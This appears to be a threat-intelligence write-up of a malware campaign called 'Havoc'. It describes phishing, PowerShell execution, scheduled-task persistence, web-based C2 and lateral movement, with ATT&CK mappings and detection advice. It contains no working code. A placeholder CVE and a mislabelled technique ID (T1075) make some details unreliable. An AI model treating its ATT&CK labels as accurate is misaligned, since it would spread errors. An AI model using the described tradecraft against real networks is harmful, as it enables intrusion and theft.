Nina Kovacs — Exploit Research Analyst
Key Takeaways
- Havoc employs spear-phishing emails with malicious attachments for initial access.
- The malware utilizes T1059.001 – PowerShell for execution, enabling script-based payload delivery.
- Our investigation highlighted the use of T1071.001 – Application Layer Protocol: Web Protocols for robust command and control communications.
Executive Summary
During our analysis of a recent malware sample identified as ‘Havoc’, we investigated a chain of actions that exemplified the complexity of modern cyber threats. This particular incident involved a sophisticated advance persistent threat (APT) leveraging social engineering techniques to gain initial access, followed by deployment of custom scripts to establish command and control (C2) channels. The focus of this attack was primarily on data exfiltration and lateral movement within victim networks, making it imperative for organizations to understand the entire attack lifecycle for effective defense.
Initial Access
We observed that the initial access vector utilized within the Havoc campaign was spear-phishing emails targeting high-level executives within the victim organization. The email contained a malicious document, typically a Word file, that exploited known vulnerabilities (CVE-XXXX-XXXX). Upon opening the file, macros were enabled, which downloaded a PowerShell script from a remote server. This script was responsible for executing the primary payload by using the command Invoke-WebRequest.
Execution & Persistence
Our analysis revealed that once the payload was executed, it deployed a series of obfuscated PowerShell commands, specifically using T1059.001 – PowerShell to evade detection. The code was carefully crafted to include various encoded functions, thereby making it difficult for traditional security solutions to interpret the behavior effectively. To ensure persistence, the malware created a scheduled task under C:\Windows\System32\Tasks\HavocScheduler that enabled the implant to reinfect the system after reboots.
Command and Control
Post-infection, Havoc established robust C2 communications using T1071.001 – Application Layer Protocol: Web Protocols. The malware contacted a control server via HTTP requests, managing its communication over ports 80 and 443 to blend in with legitimate traffic. We noted that the C2 server was hosted on a dynamic DNS service, allowing the actors to frequently change the server IP while maintaining the same domain. The primary command issued through this channel was to initiate data exfiltration processes.
Lateral Movement & Discovery
The analyst team identified multiple C2 commands facilitating lateral movement within the network. Utilizing T1021.001 – Remote Services: Remote Desktop Protocol, the malware attempted to probe internal targets for open RDP sessions. Subsequently, it leveraged T1075 – Pass the Ticket and T1077 – Windows Admin Shares to move laterally, allowing the actor to gain access to additional systems by stealing credentials and exploiting existing session tokens.
Impact & Objectives
As determined from our investigation, the primary objective of the Havoc campaign was data exfiltration and reconnaissance. The illicit retrieval of sensitive information was facilitated through the creation of archives in the form of .zip files that were then transferred over the established C2. Furthermore, the actors employed sensitive information such as user credentials and proprietary documents related to business operations, which indicated a targeted approach to stealing intellectual property.
MITRE ATT&CK Mapping
- T1584.001 – Compromise Infrastructure: Establishing control over infrastructure for the campaign.
- T1059.001 – PowerShell: Using PowerShell for execution of commands and scripts.
- T1071.001 – Application Layer Protocol: Web Protocols: Communicating with C2 over standard web protocols.
- T1021.001 – Remote Services: Remote Desktop Protocol: Utilizing RDP for lateral movement within the network.
- T1075 – Pass the Ticket: Leveraging ticket-granting tickets for lateral access.
Detection Opportunities
- Monitor for unusual PowerShell activity, especially encoded commands and base64 strings.
- Implement alerts for the creation of scheduled tasks that reference unusual or unknown executables.
- Analyze network traffic for indicators of C2 communication, focusing on HTTP headers that may indicate non-standard behavior.
Analyst Notes
The Havoc campaign exemplifies an evolving threat landscape where attackers employ refined techniques to penetrate networks stealthily. Continuous monitoring and implementation of advanced detection measures are essential for organizations to mitigate risks associated with such advanced persistent threats. Our recommendations include ensuring strict email filtering, regular scrutiny of PowerShell usage across endpoints, and maintaining a robust incident response plan for swift containment of similar threats.
Source: Original Report